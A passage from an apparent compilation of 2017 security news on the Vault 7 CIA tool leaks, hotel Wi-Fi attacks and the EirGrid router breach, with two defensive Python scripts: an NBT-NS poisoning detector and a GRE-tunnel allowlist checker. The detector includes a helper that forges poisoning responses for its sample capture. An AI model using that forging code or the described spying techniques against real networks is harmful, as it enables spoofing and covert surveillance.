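    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, n, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15], off + 1 + n + 1


def build_query(txid, name):
    hdr = struct.pack(">HHHHHH", txid, FLAG_BROADCAST_RD, 1, 0, 0, 0)
    return hdr + first_level_encode(name) + struct.pack(">HH", QTYPE_NB, 1)


def build_response(txid, name, answer_ip, ttl=300000):
    """Positive name query response, the shape a poisoner sends for any name it hears."""
    hdr = struct.pack(">HHHHHH", txid, FLAG_RESPONSE | FLAG_AUTHORITATIVE, 0, 1, 0, 0)
    rdata = struct.pack(">H", 0x0000) + bytes(int(o) for o in answer_ip.split("."))
    rr = first_level_encode(name) + struct.pack(">HHIH", QTYPE_NB, 1, ttl, len(rdata)) + rdata
    return hdr + rr


def parse_nbns(buf):
    """Return (is_response, txid, [(name, claimed_ip), ...]) for one NBT-NS payload."""
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", buf[:12])
    off = 12
    for _ in range(qd):                       # skip question entries
        _name, _suffix, off = first_level_decode(buf, off)
        off += 4                              # qtype + qclass
    answers = []
    for _ in range(an):
        name, _suffix, off = first_level_decode(buf, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", buf[off:off + 10])
        off += 10
        rdata = buf[off:off + rdlen]
        off += rdlen
        if rtype == QTYPE_NB and rdlen >= 6:  # NB_FLAGS (2 bytes) + IPv4 address
            answers.append((name, ".".join(str(b) for b in rdata[2:6])))
    return bool(flags & FLAG_RESPONSE), txid, answers


def find_poisoners(packets, canary_names=CANARY_NAMES):
    """packets: iterable of (source_ip, udp_payload). Any positive answer for a
    canary name is a poisoner: return (responder_ip, name, claimed_ip) alerts."""
    alerts = []
    for src, raw in packets:
        is_response, _txid, answers = parse_nbns(raw)
        if not is_response:
            continue
        for name, claimed in answers:
            if name in canary_names:
                alerts.append((src, name, claimed))
    return alerts


def sample_packets():
    """Constructed capture: a canary query, a poisoner's answer, and a legitimate answer."""
    return [
        ("10.0.0.5", build_query(0x1234, "CANARY01")),
        ("10.0.0.99", build_response(0x1234, "CANARY01", "10.0.0.99")),
        ("10.0.0.20", build_response(0x1235, "PRINTER01", "10.0.0.20")),
    ]


if __name__ == "__main__":
    for alert in find_poisoners(sample_packets()):
        print("NBT-NS poisoning suspected from %s (answered %s -> %s)" % alert)
```

In a real deployment the canary query would be sent periodically from a monitoring host and the UDP/137 payloads fed in from a capture; the response for PRINTER01 is left alone because that name is not a canary. The longer-term mitigation is the one this detection hints at: disable NBT-NS (and LLMNR) on managed Windows hosts so there are no broadcast name lookups for a poisoner to answer.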
While the hacking group carried out the attack against the hotel network, researchers believe that the group could also directly target "hotel guests of interest"—generally business and government personnel who travel in a foreign country.
The researchers revealed one such incident that occurred in 2016 where Fancy Bear accessed the computer and Outlook Web Access (OWA) account of a guest staying at a hotel in Europe, 12 hours after the victim connected to the hotel’s Wi-Fi network.
This is not the only attack that apparently aimed at guests of hotels. South Korea-nexus Fallout Team (also known as DarkHotel) has previously carried out such attacks against Asian hotels to steal information from senior executives from large global companies during their business trips.
Duqu 2.0 malware was also found targeting the Wi-Fi networks of European hotels used by participants in the Iranian nuclear negotiations. High-profile people visiting Russia and China may also have their laptops and other electronic devices accessed.
The easiest way to protect yourself is to avoid connecting to hotel Wi-Fi networks or any other public or untrusted networks, and instead, use your mobile device hotspot to get access to the Internet.


CIA's "CouchPotato" Collects Video Streams

12.8.2017 securityweek BigBrothers
WikiLeaks has published documents that describe a remote tool allegedly used by the U.S. Central Intelligence Agency (CIA) to collect RTSP/H.264 video streams.

Dubbed “CouchPotato,” the tool can apparently be used to collect the stream as a video file (AVI), or to capture still images (JPG) of frames from the stream, as long as these frames are “of significant change from a previously captured frame.”

To perform the video and image encoding and decoding operations, the tool leverages the free software project FFmpeg. However, many audio and video codecs, along with unnecessary features, have been removed from the FFmpeg version used by CouchPotato.

To provide the tool with image change detection features, the pHash image hashing algorithm has been integrated into FFmpeg’s image2 demuxer. CouchPotato also uses RTSP connectivity and “relies on being launched in an ICE v3 Fire and Collect compatible loader,” the tool’s user guide published on WikiLeaks reveals (PDF).

Thus, the use of this tool requires a loader that can support the ICE v3 specification (Fire and Collect are mentioned as suitable options, along with ShellTerm, which was used to test CouchPotato during development). Python 2 is required by the module handler script, which should also be run on a *nix host, the same host the loader runs on.

To avoid being blocked by a firewall when sending or receiving data, CouchPotato should be injected into a non-critical host process on the target machine, the documents explained. The user manual specifically recommends not to launch out of a process critical to the system’s stability. The tool can be operated using a command-line interface.

Targeting RTSP and H.264 video formats, which are normally used by IP-based surveillance cameras streaming video content over LAN or the Internet, CouchPotato requires the video stream URL to function and doesn’t necessarily require compromising the target’s network.

The user guide published on WikiLeaks details the various arguments the tool supports, along with the limitations and caveats the tool inherits, such as high CPU usage for the injected process.


Wikileaks – CIA CouchPotato remote tool can stealthy collect RTSP/H.264 video streams
11.8.2017 securityaffairs BigBrothers

WikiLeaks has published another Vault 7 leak, revealing the CIA tool CouchPotato that allows operators to remotely spy on video streams in real-time.
“Today, August 10th 2017, WikiLeaks publishes the User Guide for the CouchPotato project of the CIA. CouchPotato is a remote tool for collection against RTSP/H.264 video streams. It provides the ability to collect either the stream as a video file (AVI) or capture still images (JPG) of frames from the stream that are of significant change from a previously captured frame. It utilizes ffmpeg for video and image encoding and decoding as well as RTSP connectivity. CouchPotato relies on being launched in an ICE v3 Fire and Collect compatible loader.” states WikiLeaks.

The document leaked from the CIA details how the tool could be used by cyber spies to remotely capture RTSP/H.264 video streams.

The Real Time Streaming Protocol (RTSP) is a network control protocol designed for controlling streaming media servers.

“CouchPotato is a remote tool for collection against RTSP/H.264 video streams. It provides the ability to collect either the stream as a video file (AVI) or capture still images (JPG) of frames from the stream that are of significant change from a previously captured frame. CouchPotato utilizes ffmpeg for video and image encoding and decoding as well as RTSP connectivity.” reads the user guide. “In order to minimize size of the DLL binary, many of the audio and video codecs along with other unnecessary features have been removed from the version of ffmpeg that CouchPotato is built with. pHash, an image hashing algorithm, has been incorporated into ffmpeg’s image2 demuxer to provide image change detection capabilities. CouchPotato relies on being launched in an ICE v3 Fire and Collect compatible loader.”


The CouchPotato tool utilizes FFmpeg for video and image encoding and decoding and Real Time Streaming Protocol connectivity.

The CouchPotato tool is hard to detect: it supports the file-less ICE v3 “Fire and Collect” loader, which is an in-memory code execution (ICE) technique.

The documents don’t include details on how the CIA operators compromise the target systems. It is likely the CouchPotato tool needs to be used in conjunction with other hacking tools to penetrate the targeted systems.

Below is the list of releases published by WikiLeaks since March:

Couchpotato – 10 August, 2017
Dumbo – 03 August, 2017
Imperial – 27 July, 2017
UCL/RAYTHEON – 19 July, 2017
HighRise – 13 July, 2017
BothanSpy and Gyrfalcon – 06 July, 2017
OutlawCountry – 30 June, 2017
ELSA malware – 28 June, 2017
Cherry Blossom – 15 June, 2017
Pandemic – 1 June, 2017
Athena – 19 May, 2017
AfterMidnight – 12 May, 2017
Archimedes – 5 May, 2017
Scribbles – 28 April, 2017
Weeping Angel – 21 April, 2017
Hive – 14 April, 2017
Grasshopper – 7 April, 2017
Marble Framework – 31 March, 2017
Dark Matter – 23 March, 2017


Experts Who Hacked U.S. Air Force Earned $130,000

11.8.2017 securityweek BigBrothers
Hundreds of bug bounty hunters signed up for the U.S. Department of Defense’s “Hack the Air Force” initiative and they earned more than $130,000 for the vulnerabilities they reported.

Between May 30 and June 23, the Pentagon invited vetted researchers, members of the military and government civilians from the United States, the United Kingdom, Canada, Australia and New Zealand to take a crack at the Air Force’s networks. Hack the Air Force, hosted by the HackerOne platform, was the most open federal program to date.

A total of 272 hackers signed up and they submitted 207 valid vulnerability reports. The first flaw was reported within one minute of the bug bounty program’s launch.

The more than 200 vulnerabilities earned participants over $130,000, an average of $644 per flaw.

Only two of the white hat hackers who submitted valid reports were employed by the military. The researcher who earned the most was a 17-year-old who submitted 30 valid reports.

“Adversaries are constantly attempting to attack our websites, so we welcome a second opinion — and in this case, hundreds of second opinions — on the health and security of our online infrastructure,” said Peter Kim, CISO of the U.S. Air Force. “By engaging a global army of security researchers, we’re better able to assess our vulnerabilities and protect the Air Force’s efforts in the skies, on the ground and online.”

While the Hack the Air Force initiative is over, experts who find vulnerabilities in the organization’s systems can still report them to the Pentagon through its ongoing vulnerability disclosure program.

A total of 371 people registered for the previous Hack the Army program and they were awarded roughly $100,000 for 118 valid vulnerability reports. Hack the Pentagon received 138 valid submissions and it cost the U.S. government $150,000, half of which went to participants.


CouchPotato: CIA Hacking Tool to Remotely Spy On Video Streams in Real-Time

10.8.2017 thehackernews BigBrothers

After disclosing CIA's strategies to hijack and manipulate webcams and microphones to corrupt or delete recordings, WikiLeaks has now published another Vault 7 leak, revealing CIA's ability to spy on video streams remotely in real-time.
Dubbed 'CouchPotato,' the document leaked from the CIA details how agency operators use a remote tool to stealthily collect RTSP/H.264 video streams.
Real Time Streaming Protocol, or RTSP, is a network control protocol designed for use in entertainment and communication systems for controlling streaming media servers.
CouchPotato gives CIA hackers ability to "collect either the stream as a video file (AVI) or capture still images (JPG) of frames from the stream that are of significant change from a previously captured frame," a leaked CIA manual reads.
The tool utilises FFmpeg for video and image encoding and decoding and Real Time Streaming Protocol connectivity.
The CouchPotato tool works stealthily without leaving any evidence on the targeted systems because it has been designed to support ICE v3 "Fire and Collect" loader, which is an in-memory code execution (ICE) technique that runs malicious code without the module code being written to the disk.
However, neither WikiLeaks nor the leaked user guide details how the agency penetrates the targeted systems in the first place, but since the publication has previously leaked many CIA malware samples, exploits and hacking tools for getting into a network, the agency might have been using CouchPotato in combination with other tools.
Previous Vault 7 CIA Leaks
Since March, WikiLeaks has published 20 batches of "Vault 7" series, which includes the latest and last week leaks, along with the following batches:
Imperial — Details of at least 3 CIA-developed hacking tools and implants designed to target PCs running Apple Mac OS X and different flavours of Linux operating systems.
UCL/Raytheon — An alleged CIA contractor that analysed in-the-wild malware and hacking tools and submitted at least five reports to the agency to help the CIA develop its own malware.
Highrise — An alleged CIA project that lets the spying agency stealthily collect and forward stolen data from compromised smartphones to its server via SMS.
BothanSpy and Gyrfalcon — 2 alleged CIA implants that let the CIA intercept and exfiltrate SSH credentials from targeted Windows and Linux PCs using different attack vectors.
OutlawCountry – An alleged CIA project that allowed the spying agency to hack and remotely spy on systems running Linux OS.
ELSA – Alleged CIA malware that tracks geo-location of targeted computers and laptops running the Microsoft Windows OS.
Brutal Kangaroo – A tool suite for Microsoft Windows OS used by the CIA agents to target closed networks or air-gap computers within an organisation or enterprise without requiring any direct access.
Cherry Blossom – A framework employed by the agency to monitor the Internet activity of the targeted systems by exploiting flaws in Wi-Fi devices.
Pandemic – A CIA's project that allowed the spying agency to turn Windows file servers into covert attack machines that can silently infect other PCs of interest inside the same network.
Athena – A spyware framework that the agency designed to take full control over infected Windows systems remotely; it works against every version of Windows, from Windows XP to Windows 10.
AfterMidnight and Assassin – 2 alleged CIA malware frameworks for the Microsoft Windows platform that's meant to monitor and report back actions on the infected remote host PC and execute malicious actions.
Archimedes – Man-in-the-middle attack tool reportedly developed by the CIA to target computers and laptops inside a Local Area Network (LAN).
Scribbles – Software supposedly designed to embed 'web beacons' into confidential files and documents, allowing the CIA to track insiders and whistleblowers.
Grasshopper – A framework that allowed the spying agency to quickly create custom malware for breaking into Microsoft Windows OS and bypassing antivirus protection.
Marble – Source code of a secret anti-forensic framework used by the CIA agents to hide the actual source of its malware.
Dark Matter – Hacking tools the spying agency used to target iPhones and Macs.
Weeping Angel – Spying tool used by the CIA to infiltrate smart TVs, and transforming them into covert microphones.
Year Zero – CIA hacking tools and exploits for popular hardware and software.


Kenya Opposition Claims Vote Has Been Hacked

9.8.2017 securityweek BigBrothers

Hackers broke into the database of Kenya's electoral commission and manipulated the results of the election, the leader of the country's opposition coalition alleged on Wednesday.

Vote counting is ongoing in east Africa's strongest democracy after Tuesday's election where voters were asked to either re-elect President Uhuru Kenyatta or replace him with longtime opposition leader Raila Odinga.

Odinga claims hackers used the credentials of a murdered employee of the electoral commission (IEBC) to hack into an electronic voting system and activate an algorithm that inflated Kenyatta's votes.

"These results are fake, it is a sham. They cannot be credible," Odinga told reporters at a morning press conference.

"This is an attack on our democracy. The 2017 general election was a fraud."

He later released what he claimed was a log from an IEBC server to support his allegations that the server was configured to increase Kenyatta's totals by 11 percent and cover up the modifications.

The log, and Odinga's allegations, have not been independently verified.

With ballots from 92 percent of polling stations counted, electoral commission (IEBC) results showed Kenyatta leading, with 54.4 percent of the nearly 13 million ballots tallied, against Odinga's 44.7 percent, a difference of 1.3 million votes.

But Odinga believes the vote is actually in his favour, and tweeted that a count of ballots by his National Super Alliance (NASA) coalition showed him in the lead.

He said the hacking affected all the results, both the presidential and the general election.

The hackers were able to access the system using the credentials of Chris Msando, a top IT official at the IEBC found tortured and murdered in late July, Odinga said.

He would not say how he got the information, saying he wanted to protect his source.

The 72-year-old is making his fourth bid for the presidency, and has previously accused his rivals of stealing victory from him through rigging in 2007 and in 2013.

In 2007, the disputed vote resulted in two months of ethnically driven political violence that killed 1,100 people and displaced 600,000, a major blow to a nation seen as a regional bastion of stability.

The contested election in 2013 was taken to the courts and ended largely peacefully, though Odinga lost.

Odinga urged his supporters to "remain calm as we look deep into this matter," but added: "I don't control the people."


China's Web Users Fear Losing Tools to Bypass 'Great Firewall'

8.8.2017 securityweek BigBrothers
Enterprising internet users in China fear the tools they use to tunnel through the country's "Great Firewall" may soon disappear, as Beijing tightens its grip on the web.

Tens of millions of people are estimated to use Virtual Private Networks (VPNs) to bypass Chinese internet restrictions -- getting access to blocked websites such as Facebook and Twitter.

Beijing has for years turned a blind eye to these holes in its Great Firewall, but recent events suggest the virtual tunnels may soon be bricked up.

In January China's Ministry of Industry and Information Technology (MIIT) announced it would be banning the use of unlicensed providers of the services.

In the months since the rule's announcement, rumours have swirled that a crackdown was coming, but there was little clarity on what exactly the rule meant and how, or even if, it would be implemented.

In the past few weeks, however, omens of significant tightening seem to be everywhere.

Several luxury hotels in Beijing have said they will stop using the tools, which once provided unfiltered Internet as a convenience to their customers.

On Thursday, a cloud service provider in the capital notified users that it would practise shutting down and reporting VPN providers on the orders of Beijing's Public Security bureau.

Tech giants Apple and Amazon, too, have moved to limit their customers' access to the tools in China in what has been seen as a voluntary move to get ahead of the impending crackdown.

On Sunday, Apple said it was removing a number of the programs from its app store, while Amazon's Chinese partner said that customers would no longer be allowed to use "illegal" VPNs on its cloud service.

"There have been many rounds of government murmurings about VPN crackdowns, and foreign and Chinese businesses had grown used to only minor or temporary restrictions," said Graham Webster, a senior research scholar at Yale Law School.

But "this time appears different."

'You cannot lock the heart'

For now, however, it still remains unclear who will be able to access VPNs and under what circumstances, a situation that has left both companies and regular users on tenterhooks.

Ordinary people have reacted to the new rules with a mixture of annoyance and quiet defiance.

"You've blocked the last way to watch US TV dramas, as well as my Facebook friends!" one user of China's Twitter-like Weibo platform said after the Apple announcement.

"You can lock my cellphone, but you cannot lock my heart."

Firms are casting around for information about the developments and have expressed alarm at the potential impact on the way they do business.

In a statement, the European Chamber of Commerce told AFP it "has not seen any updated official document concerning restrictions on VPN use by companies," adding that in a recent survey of its members almost half expressed concern that the "continued strengthening of measures to tighten Internet control and access are having an even bigger negative impact on their companies".

"Our members' success depends on instantaneous access to information worldwide, and the ability to freely communicate with affiliates, suppliers and customers around the world," William Zarit, Chairman of the American Chamber of Commerce in China said in a statement to AFP.

"Recent regulatory developments, including limiting VPN use, have created uncertainty for cross-border data communication."

Apple has come under fire for bowing to the rules, but in an earnings call Tuesday CEO Tim Cook said the firm had to follow local laws.

He said Apple was "hopeful that over time the restrictions we're seeing are lessened, because innovation really requires freedom to collaborate and communicate".

'Tighten Internet control'

Analysts said that Beijing was likely not looking to choke off VPNs completely, but was instead seeking to control them more tightly.

James Gong, an expert on Chinese cyber law at Herbert Smith Freehills, said that the regulations are not targeted at companies.

The government can "shut things down, but that's not their purpose," he said.

Instead "they want to drive all the traffic through the network operators so all of the connections will be transparent to them".

Paul Triolo, head of global technology at the Eurasia Group, said he believes that the ultimate goal is not to cut off all VPNs but to "get visibility on (their) use so that they know what is going in and out and can turn off selectively if they want to or need to".

In a statement to AFP last month, MIIT explained that under the new rules, companies will only be allowed to rent VPN services from "telecommunications operators that have set up an international communications entry and exit office in accordance with the law".

Previously released MIIT regulations state that only state-owned telecoms can set up the offices, effectively guaranteeing that all licensed VPNs are operated by the state.

A representative from state-owned telecom China Unicom confirmed to AFP that it was legally allowed to rent VPN services to businesses, as long as they provide proof of registration in China.

"It's highly unlikely that all VPN access would be eliminated," Yale's Webster said, but added in the future the software might be increasingly "expensive and government-controlled".


Irish electricity transmission system operator EirGrid targeted by a nation-state actor
8.8.2017 securityaffairs BigBrothers

The Irish electricity transmission system operator EirGrid was targeted by a state-sponsored actor, the hackers weren’t discovered at least for two months.
The Irish electricity transmission system operator EirGrid was targeted by a state-sponsored attack. EirGrid is the state-owned company that operates the electricity transmission grid across Ireland; it also supplies the distribution network operated by ESB Networks that powers every electricity customer in the country.

According to the Independent.ie, a nation-state actor using IP addresses sourced in Ghana and Bulgaria targeted the company. The hackers first gained access to a Vodafone network used by EirGrid in the UK in April, then they compromised the routers used by the Irish operator in Wales and Northern Ireland.

The hackers were able to install “a virtual wire tap”, namely a Generic Routing Encapsulation (GRE) tunnel, on EirGrid’s Vodafone router located in Shotton. The GRE tunnel allowed them to access the unencrypted traffic sent to and from the company.
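A GRE tunnel configured on a carrier or edge router is a plain IP protocol 47 flow between two endpoints, so the first thing a defender can do is compare every GRE endpoint pair seen in flow telemetry with the tunnels that change control actually provisioned. The following is an added example written for this page, not EirGrid's, Vodafone's or Independent.ie's code or data: the flow format, the allowlist of known tunnel peers and the internal address ranges are assumptions, and the flow records are constructed.

```python
import ipaddress

# Added example (not EirGrid's, Vodafone's or Independent.ie's data or code):
# scan flow records for GRE tunnels that the network team never provisioned.
# Flow format, allowlist and address ranges are assumptions for this example.

GRE_PROTOCOL = 47  # IANA IP protocol number for GRE

# Constructed exporter-style flow records: src_ip,dst_ip,ip_protocol,bytes
SAMPLE_FLOWS = """\
10.20.1.5,10.20.9.7,6,48213
192.0.2.10,198.51.100.4,47,9120332
192.0.2.10,203.0.113.77,47,88412
192.0.2.11,192.0.2.12,47,1203
10.20.1.9,10.20.1.10,17,300
"""

# Assumed: the only GRE tunnel change control knows about (order-independent pair).
KNOWN_GRE_PEERS = {frozenset({"192.0.2.10", "198.51.100.4"})}
# Assumed: address space the organisation and its carrier operate.
INTERNAL_RANGES = [ipaddress.ip_network(n)
                   for n in ("10.0.0.0/8", "192.0.2.0/24", "198.51.100.0/24")]


def parse_flows(text):
    """Parse the constructed CSV flow format into dicts."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        src, dst, proto, nbytes = line.split(",")
        flows.append({"src": src, "dst": dst, "proto": int(proto), "bytes": int(nbytes)})
    return flows


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_RANGES)


def find_unexpected_gre(flows, known_peers=KNOWN_GRE_PEERS):
    """Return one alert per GRE flow whose endpoint pair is not on the allowlist.
    A peer outside the organisation's ranges is the classic sign of a tap that
    forwards copied traffic to a collector the attacker controls."""
    alerts = []
    for f in flows:
        if f["proto"] != GRE_PROTOCOL:
            continue
        pair = frozenset({f["src"], f["dst"]})
        if pair in known_peers:
            continue
        alerts.append({
            "src": f["src"],
            "dst": f["dst"],
            "bytes": f["bytes"],
            "external_peer": not (is_internal(f["src"]) and is_internal(f["dst"])),
        })
    return alerts


if __name__ == "__main__":
    for a in find_unexpected_gre(parse_flows(SAMPLE_FLOWS)):
        print("unexpected GRE tunnel %s -> %s, %d bytes, external peer: %s"
              % (a["src"], a["dst"], a["bytes"], a["external_peer"]))
```

On the constructed records the provisioned tunnel is ignored, the tunnel to 203.0.113.77 is flagged with an external peer, and the small internal-only GRE flow is flagged too, since an unplanned tunnel between two internal routers is still worth a ticket. The same check can be run against router configuration (tunnel interfaces) as well as against flows, which catches a tap that has not carried traffic yet.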

According to the Independent.ie the hackers weren’t discovered for at least two months, and the worst aspect of the story is that sources informed of the hack confirmed it is still not known whether any malware is still present on EirGrid’s control systems.

An attacker could be interested in hacking systems at the company to trigger a massive power outage across the country.
“Independent.ie has learned that the hack came to light after a tip-off from Vodafone and the National Cyber Security centre in the UK to EirGrid.” reported the Independent.ie.

“Vodafone discovered that there had been a breach on their Direct Internet Access (DIA) service which is internet provider to Eirgrid’s interconnector site in Shotton, Wales. The original breach took place on April 20 and lasted just short of seven hours.”
A source said that both Vodafone and the National Cyber Security Centre believe the attack was powered by a nation-state actor, while police services in Ireland and the UK do not believe that it was powered by foreign hackers.
Independent.ie discovered that all communications leaving the Eirgrid site and passing through the DIA router were “monitored and maybe interrogated” by a third party with direct access to the device.
At the time of this post, Vodafone is still investigating the volume of traffic transferred over the GRE tunnel.

“However it was able to tell the state supplier that all the compromised router devices had their firmware and files copied by the attackers.” states the Independent.

“A source said this allows the hackers to inspect the network configuration of Vodafone and “possibly launch a further more devious attack through some unknown vulnerabilities”.”
A further internal investigation revealed that the offices of the System Operator for Northern Ireland (SONI), that is wholly owned by EirGrid, were also exposed due to the cyber attack.
“At EirGrid Group, the security of our computer network and of the electricity control system is an utmost priority.” said David Martin, a spokesperson for EirGrid Group.

“We take all necessary steps to ensure that our systems are secure and protected and we remain vigilant to potential cyber threats, by continuously monitoring the external environment and by engaging with the relevant authorities.”
“It is EirGrid Group’s policy not to comment publicly on specific operational matters related to cyber security, however, we are aware of the currently reported focus on energy companies and national infrastructure and wish to state that our computer systems have not been breached.”

“Vodafone does not comment on specific security incidents. In such cases we always work closely with the relevant authorities to investigate and take immediate actions to contain the issue and protect our customers.” said a Vodafone spokesman.


US Army bans use of Chinese DJI drones over cyber security concerns
7.8.2017 securityaffairs BigBrothers

The US Army has ordered its units to stop using Chinese DJI drones because of “cyber vulnerabilities” in the products.
The US Army is going to ban its units from using drones manufactured by the Chinese firm DJI due to “cyber vulnerabilities”.

The decision was based on the findings of research conducted by the Army Research Laboratory and the Navy, which discovered vulnerabilities in DJI products.

A memo issued by the US Army’s Lieutenant General Joseph Anderson orders all US Army units that are currently employing DJI drones to stop using them.

DJI (Da-Jiang Innovation Corporation) is a Chinese firm based in Shenzhen; Goldman Sachs and Oppenheimer estimated in 2016 that DJI had about a 70 percent share of the global commercial and consumer drone market.

In the memo, soldiers are also ordered to remove all batteries and storage media from their DJI drones and await further instructions.

“Due to increased awareness of cyber vulnerabilities associated with DJI products, it is directed that the US Army halt use of all DJI products,” states the memo.

DJI said it was disappointed to read about the US Army’s ban on the use of its drones.

DJI’s Public Relations Manager, Michael Perry, sent the following email to sUAS News:

“We are surprised and disappointed to read reports of the U.S. Army’s unprompted restriction on DJI drones as we were not consulted during their decision. We are happy to work directly with any organization, including the U.S. Army, that has concerns about our management of cyber issues.”

“We’ll be reaching out to the U.S. Army to confirm the memo and to understand what is specifically meant by ‘cyber vulnerabilities’.”

A U.S. Army spokesperson confirmed that the memo was issued and added that they are currently reviewing it.

DJI made headlines in April 2016 when the company came under pressure from the Chinese government to grant access to the data collected by its drones, including telemetry, GPS location data, flight records and possibly video shot by users and uploaded to its servers.


Wikileaks – CIA Dumbo tool allows agents to disable security cameras
4.8.2017 securityaffairs BigBrothers

Wikileaks published a new batch of files belonging to the CIA Vault 7 archive that reveals the ‘Dumbo’ tool used by the agents to disable security cameras.
Wikileaks published a new batch of files belonging to the CIA Vault 7 archive; the documents detail a tool code named ‘Dumbo’ that was developed by the intelligence agency to disable security cameras and corrupt recordings.

It identifies installed devices like webcams and microphones, either locally or connected by wireless (Bluetooth, WiFi) or wired networks.

CIA agents have to execute “Dumbo” directly from a USB thumb drive on the targeted device; it requires SYSTEM privileges to perform its activity.

The tool supports 32-bit Windows XP, Windows Vista, and newer versions of the Windows operating system. 64-bit Windows XP and Windows versions prior to XP are not supported.

The tool is able to mute microphones, disable network adapters, and suspend processes utilizing webcams and corrupt any video recordings.

“Dumbo is a capability to suspend processes utilizing webcams and corrupt any video recordings that could compromise a PAG deployment. The PAG (Physical Access Group) is a special branch within the CCI (Center for Cyber Intelligence); its task is to gain and exploit physical access to target computers in CIA field operations.” states the description of the tool provided by Wikileaks.

Dumbo also tells operators where footage files are stored, allowing their corruption or deletion.

“[The tool] identifies installed devices like webcams and microphones, either locally or connected by wireless (Bluetooth, WiFi) or wired networks. All processes related to the detected devices (usually recording, monitoring or detection of video/audio/network streams) are also identified and can be stopped by the operator,” WikiLeaks said. “By deleting or manipulating recordings the operator is aided in creating fake or destroying actual evidence of the intrusion operation.”

According to the user guide, Personal Security Products such as the Kaspersky antivirus may block the installation of the device driver necessary to perform Dumbo operations.


Below is the list of releases published by Wikileaks since March:

Dumbo – 03 August, 2017
Imperial – 27 July, 2017
UCL/RAYTHEON – 19 July, 2017
HighRise – 13 July, 2017
BothanSpy and Gyrfalcon – 06 July, 2017
OutlawCountry – 30 June, 2017
ELSA malware – 28 June, 2017
Cherry Blossom – 15 June, 2017
Pandemic – 1 June, 2017
Athena – 19 May, 2017
AfterMidnight – 12 May, 2017
Archimedes – 5 May, 2017
Scribbles – 28 April, 2017
Weeping Angel – 21 April, 2017
Hive – 14 April, 2017
Grasshopper – 7 April, 2017
Marble Framework – 31 March, 2017
Dark Matter – 23 March, 2017


This is How CIA Disables Security Cameras During Hollywood-Style Operations

3.8.2017 thehackernews  BigBrothers

In the last 20 years, we have seen hundreds of caper/heist movies where spies or bank robbers hijack surveillance cameras of secure premises to either stop recording or set up an endless loop for covert operations without leaving any evidence.
Whenever I see such scenes in a movie, I wonder and ask myself: Does this happen in real-life?
Yes, it does, trust me—at least CIA agents are doing this.
WikiLeaks has just unveiled another classified CIA project, dubbed 'Dumbo,' which details how CIA agents hijack and manipulate webcams and microphones in Hollywood style "to gain and exploit physical access to target computers in CIA field operations."
The Dumbo CIA project involves a USB thumb drive equipped with a Windows hacking tool that can identify installed webcams and microphones, either connected locally, wired or wirelessly via Bluetooth or Wi-Fi.
Once identified, the Dumbo program allows the CIA agents to:
Mute all microphones
Disable all network adapters
Suspend any processes using a camera recording device
Selectively corrupt or delete recordings
However, there are two dependencies for a successful operation:
The Dumbo program requires SYSTEM level privilege to run.
The USB drive must remain plugged into the system throughout the operation to maintain control over connected surveillance devices.
This project is being used by the CIA's Physical Access Group (PAG)—a special branch within the Center for Cyber Intelligence (CCI) which is tasked to gain and exploit physical access to target computers in CIA field operations.
Previous Vault 7 CIA Leaks
Last week, WikiLeaks published another CIA project, dubbed 'Imperial,' which revealed details of at least 3 CIA-developed hacking tools and implants designed to target computers running Apple Mac OS X and different flavours of Linux operating systems.
Since March, WikiLeaks has published 19 batches in the "Vault 7" series, which include the latest and last week's leaks, along with the following batches:
UCL/Raytheon — An alleged CIA contractor, which analysed in-the-wild advanced malware and hacking tools and submitted at least 5 reports to the agency to help it develop its own malware.
Highrise — An alleged CIA project that allowed the spying agency to stealthily collect and forward stolen data from compromised smartphones to its server via SMS messages.
BothanSpy and Gyrfalcon — 2 alleged CIA implants that allowed the agency to intercept and exfiltrate SSH credentials from targeted Windows and Linux computers using different attack vectors.
OutlawCountry – An alleged CIA project that allowed the agency to hack and remotely spy on computers running Linux operating systems.
ELSA – Alleged CIA malware that tracks geo-location of targeted laptops and computers running the Microsoft Windows OS.
Brutal Kangaroo – A tool suite for Microsoft Windows OS used by the CIA agents to target closed networks or air-gap computers within an organisation or enterprise without requiring any direct access.
Cherry Blossom – A framework employed by the agency to monitor the Internet activity of the targeted systems by exploiting flaws in Wi-Fi devices.
Pandemic – A CIA project that allowed the spying agency to turn Windows file servers into covert attack machines that can silently infect other PCs of interest inside the same network.
Athena – A spyware framework that the agency designed to take full control over the infected Windows systems remotely and works against every version of Windows OS–from Windows XP to Windows 10.
AfterMidnight and Assassin – 2 alleged CIA malware frameworks for the Microsoft Windows platform that are meant to monitor and report back actions on the infected remote host PC and execute malicious actions.
Archimedes – Man-in-the-middle (MitM) attack tool allegedly developed by the agency to target computers inside a Local Area Network (LAN).
Scribbles – Software allegedly designed to embed 'web beacons' into confidential documents, allowing the CIA agents to track insiders and whistleblowers.
Grasshopper – A framework which allowed the spying agency to easily create custom malware for breaking into Microsoft's Windows OS and bypassing antivirus protection.
Marble – Source code of a secret anti-forensic framework used by the agency to hide the actual source of its malware.
Dark Matter – Hacking exploits the spying agency designed to target iPhones and Macs.
Weeping Angel – Spying tool used by the CIA agents to infiltrate smart TVs, transforming them into covert microphones.
Year Zero – CIA hacking exploits for popular hardware and software.


'Dumbo' Tool Helps CIA Agents Disable Security Cameras

3.8.2017 securityweek BigBrothers
The U.S. Central Intelligence Agency (CIA) has developed a tool that disables security cameras and corrupts recordings in an effort to prevent its agents from getting compromised, according to documents published on Thursday by WikiLeaks.

The tool, dubbed “Dumbo,” is executed directly from a USB thumb drive by an operative who has physical access to the targeted device. Once executed, the program can mute microphones, disable network adapters, and suspend processes associated with video recording devices.

Dumbo also informs its user of where those video recording processes store footage so that the files can be corrupted or deleted.

The user guides made available by WikiLeaks — the latest version is dated June 2015 — show that the tool was developed in response to the need for a capability to disrupt webcams and corrupt recordings in an effort to prevent a PAG (Physical Access Group) deployment from getting compromised.

PAG is a special branch within the CIA’s Center for Cyber Intelligence (CCI) and its role is to gain physical access to computers and exploit this access, WikiLeaks said.

The tool, designed for Windows XP and newer versions of the Microsoft operating system, needs SYSTEM privileges to function correctly.

